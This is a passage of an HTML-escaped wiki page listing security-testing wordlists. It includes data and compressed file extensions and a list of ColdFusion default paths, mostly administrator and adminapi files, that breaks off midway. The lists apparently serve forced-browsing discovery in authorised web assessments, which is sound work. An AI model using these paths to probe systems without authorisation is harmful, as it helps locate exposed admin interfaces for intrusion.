.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Compressed File Types - (Update: 16 March 2010 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Compressed File Types - (Update: 16 March 2010 - Total Statements: 187)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
